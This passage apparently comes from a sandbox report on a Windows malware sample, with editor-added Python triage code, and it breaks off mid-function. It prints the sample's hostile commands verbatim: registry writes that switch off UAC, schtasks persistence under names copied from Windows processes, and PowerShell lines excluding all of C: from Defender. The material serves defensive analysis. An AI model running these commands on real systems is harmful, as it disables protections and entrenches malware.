| PID 228 wrote to memory of 2424 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 228 wrote to memory of 4684 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Users\All Users\Start Menu\dwm.exe |
| PID 228 wrote to memory of 4684 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Users\All Users\Start Menu\dwm.exe |
| PID 4684 wrote to memory of 768 | N/A | C:\Users\All Users\Start Menu\dwm.exe | C:\Windows\System32\WScript.exe |
PID 4684 wrote to memory of 768 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 4684 wrote to memory of 4424 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 4684 wrote to memory of 4424 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 768 wrote to memory of 3264 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\Start Menu\dwm.exe
PID 768 wrote to memory of 3264 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\Start Menu\dwm.exe
PID 3264 wrote to memory of 4148 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 3264 wrote to memory of 4148 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 3264 wrote to memory of 2140 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 3264 wrote to memory of 2140 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 4148 wrote to memory of 3416 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\Start Menu\dwm.exe
PID 4148 wrote to memory of 3416 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\Start Menu\dwm.exe
PID 3416 wrote to memory of 3424 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 3416 wrote to memory of 3424 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 3416 wrote to memory of 3124 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 3416 wrote to memory of 3124 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 3424 wrote to memory of 5056 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\Start Menu\dwm.exe
PID 3424 wrote to memory of 5056 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\Start Menu\dwm.exe
PID 5056 wrote to memory of 2076 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 5056 wrote to memory of 2076 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 5056 wrote to memory of 2196 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 5056 wrote to memory of 2196 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 2076 wrote to memory of 1512 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\Start Menu\dwm.exe
PID 2076 wrote to memory of 1512 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\Start Menu\dwm.exe
PID 1512 wrote to memory of 2956 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 1512 wrote to memory of 2956 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 1512 wrote to memory of 1212 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 1512 wrote to memory of 1212 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 2956 wrote to memory of 744 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\Start Menu\dwm.exe
PID 2956 wrote to memory of 744 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\Start Menu\dwm.exe
PID 744 wrote to memory of 5004 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 744 wrote to memory of 5004 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 744 wrote to memory of 4848 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 744 wrote to memory of 4848 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 5004 wrote to memory of 3712 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\Start Menu\dwm.exe
PID 5004 wrote to memory of 3712 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\Start Menu\dwm.exe
PID 3712 wrote to memory of 4768 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 3712 wrote to memory of 4768 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 3712 wrote to memory of 4004 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 3712 wrote to memory of 4004 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
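
The rows above set three UAC policy values to 0, first from the original sample and then repeatedly from the dropped dwm.exe. The following added example (editor's code, not part of the sandbox output) parses rows in the table's format, folds them into the registry state the sample leaves behind, and says what each 0 means; the sample rows are copied from the table, and the meaning of each value is taken from Microsoft's UAC policy settings documentation.

```python
"""Folds 'System policy modification' rows into the resulting UAC state.
Added example, not part of the sandbox output: the sample rows are copied
from the table above; value semantics follow Microsoft's UAC policy docs."""
import re

UAC_KEY = r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

# One table row: Set value (<type>) <key>\<value> = "<data>" <process> N/A
ROW_RE = re.compile(
    r'^Set value \((?P<type>\w+)\) (?P<key>\S+)\\(?P<value>\w+) = "(?P<data>[^"]*)" (?P<proc>.+?) N/A$'
)

# What a value of 0 means for each policy the sample rewrites (Microsoft docs).
MEANING_OF_ZERO = {
    "EnableLUA": "UAC disabled altogether (applies after the next reboot)",
    "ConsentPromptBehaviorAdmin": "administrators elevate silently, no prompt at all",
    "PromptOnSecureDesktop": "prompts drawn on the normal desktop, where other software can drive them",
}


def parse_row(row):
    """Parse one table row into a dict, or None if it is not a Set value row."""
    m = ROW_RE.match(row)
    if m is None:
        return None
    data = int(m["data"]) if m["type"] == "int" else m["data"]
    return {"key": m["key"], "value": m["value"], "data": data, "process": m["proc"]}


def effective_policy(rows):
    """Last write wins: map value name -> (data, process that wrote it)."""
    state = {}
    for row in map(parse_row, rows):
        if row is not None and row["key"].lower() == UAC_KEY.lower():
            state[row["value"]] = (row["data"], row["process"])
    return state


def uac_findings(rows):
    """One human-readable finding for every UAC policy the rows leave at 0."""
    return [
        f"{name}=0 written by {proc}: {MEANING_OF_ZERO[name]}"
        for name, (data, proc) in effective_policy(rows).items()
        if name in MEANING_OF_ZERO and data == 0
    ]


SAMPLE_ROWS = [  # copied from the table above
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\All Users\Start Menu\dwm.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\All Users\Start Menu\dwm.exe N/A',
]

if __name__ == "__main__":
    for finding in uac_findings(SAMPLE_ROWS):
        print(finding)
```

Only ConsentPromptBehaviorAdmin=0 changes behaviour immediately; EnableLUA=0 is read at boot, so a host that has not rebooted since infection still has UAC nominally on while every elevation request is already granted without a prompt.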

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\TextInputHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Users\Default User\TextInputHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\TextInputHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Defender\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Defender\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft OneDrive\setup\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Windows\es-ES\fontdrvhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\es-ES\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Windows\es-ES\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Windows\ShellExperiences\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\ShellExperiences\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Windows\ShellExperiences\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Photo Viewer\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Photo Viewer\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Photo Viewer\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Photo Viewer\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\en-US\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Program Files\dotnet\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files\dotnet\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Program Files\dotnet\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Desktop\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Public\Desktop\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Desktop\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\Start Menu\dwm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Users\All Users\Start Menu\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Start Menu\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\Adobe\sihost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Adobe\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Common Files\Adobe\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Windows\Downloaded Program Files\StartMenuExperienceHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\StartMenuExperienceHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Windows\Downloaded Program Files\StartMenuExperienceHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Music\TextInputHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Users\Admin\Music\TextInputHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\Music\TextInputHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Users\All Users\Start Menu\dwm.exe

"C:\Users\All Users\Start Menu\dwm.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ab7e06f9-2cc8-4039-a499-49e52af85ad2.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\eda212e0-b707-4135-b3ca-d394da60635d.vbs"

C:\Users\All Users\Start Menu\dwm.exe

"C:\Users\All Users\Start Menu\dwm.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\81c5646d-102c-46e0-92fd-129b90595df8.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\35541dda-7271-4b45-900f-b19f5a04cf83.vbs"

C:\Users\All Users\Start Menu\dwm.exe

"C:\Users\All Users\Start Menu\dwm.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e6fc0a39-883a-46ff-a6d3-d13ba2e70843.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d351468d-da31-44c7-b7e8-b5ac0aa20c65.vbs"

C:\Users\All Users\Start Menu\dwm.exe

"C:\Users\All Users\Start Menu\dwm.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b745de3f-71bb-43d1-b5ee-dbf9a731a082.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6fd181d3-d663-466c-8a85-35734ecdd0bb.vbs"

C:\Users\All Users\Start Menu\dwm.exe

"C:\Users\All Users\Start Menu\dwm.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\963ae9cf-215a-4c39-9f8a-a4cbef438161.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6740a6cb-9ad3-4f11-9b0c-c00dfa9ff0d3.vbs"

C:\Users\All Users\Start Menu\dwm.exe

"C:\Users\All Users\Start Menu\dwm.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b32fa960-2f85-4070-ba3e-49aa4a739b40.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\811ad167-1cf8-4192-bfe4-82bbbbc5e7d3.vbs"

C:\Users\All Users\Start Menu\dwm.exe

"C:\Users\All Users\Start Menu\dwm.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\91ca450c-7cd1-4794-aa05-82bfcf12046a.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fcdffa1d-bcbd-4b73-8a64-cced2c4b1fe6.vbs"
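
The schtasks.exe and Add-MpPreference lines above are the sample's persistence and defence-evasion steps. For each dropped copy there are three tasks: one with a trailing-letter name that relaunches the file every few minutes, one with the bare name that runs it at logon with /rl HIGHEST, and a third that reuses the first name with /rl HIGHEST and, because of /f, replaces the first task. The file names imitate Windows processes (dwm, lsass, csrss, smss, wininit) but sit in user, Recovery or Program Files directories. The PowerShell lines then exclude every top-level folder of C: from Defender. The following added example (editor's code, not from the report or from DCRat) parses such command lines and flags that pattern; the sample lines are copied from the list above, while the sets of Windows process names, trusted directories and "too broad" exclusions are the editor's assumptions.

```python
"""Triage of schtasks.exe and powershell.exe command lines from the
Processes list.  Added example, not part of the sandbox output: the sample
lines are copied from this report; WINDOWS_PROCESS_NAMES, TRUSTED_DIRS and
BROAD_EXCLUSIONS are the editor's assumptions, not something the report states."""
import re
from pathlib import PureWindowsPath

# Process names the dropper borrows from real Windows binaries (assumption,
# taken from the task names in this report).
WINDOWS_PROCESS_NAMES = {
    "dwm", "lsass", "csrss", "smss", "wininit", "sihost", "fontdrvhost",
    "explorer", "runtimebroker", "startmenuexperiencehost", "textinputhost",
    "system", "sppsvc", "dllhost",
}
# Where those names may legitimately live (assumption; extend for your estate).
TRUSTED_DIRS = tuple(PureWindowsPath(p) for p in
                     (r"C:\Windows", r"C:\Windows\System32", r"C:\Windows\SysWOW64"))
# Defender exclusions that cover a volume root or a whole system tree (assumption).
BROAD_EXCLUSIONS = {"c:/", "c:/windows/", "c:/users/", "c:/programdata/",
                    "c:/program files/", "c:/program files (x86)/"}

SCHTASKS_RE = re.compile(
    r'''schtasks\.exe /create /tn "(?P<name>[^"]+)" /sc (?P<sched>\w+)'''
    r'''(?: /mo (?P<mod>\d+))? /tr "'?(?P<cmd>[^'"]+)'?"(?P<rl> /rl HIGHEST)? /f''',
    re.IGNORECASE,
)
EXCLUSION_RE = re.compile(r"Add-MpPreference -ExclusionPath '(?P<path>[^']+)'", re.IGNORECASE)


def parse_schtask(line):
    """Fields of a `schtasks /create` line, or None for any other line."""
    m = SCHTASKS_RE.search(line)
    if m is None:
        return None
    return {
        "name": m["name"],
        "schedule": m["sched"].upper(),            # MINUTE or ONLOGON in this report
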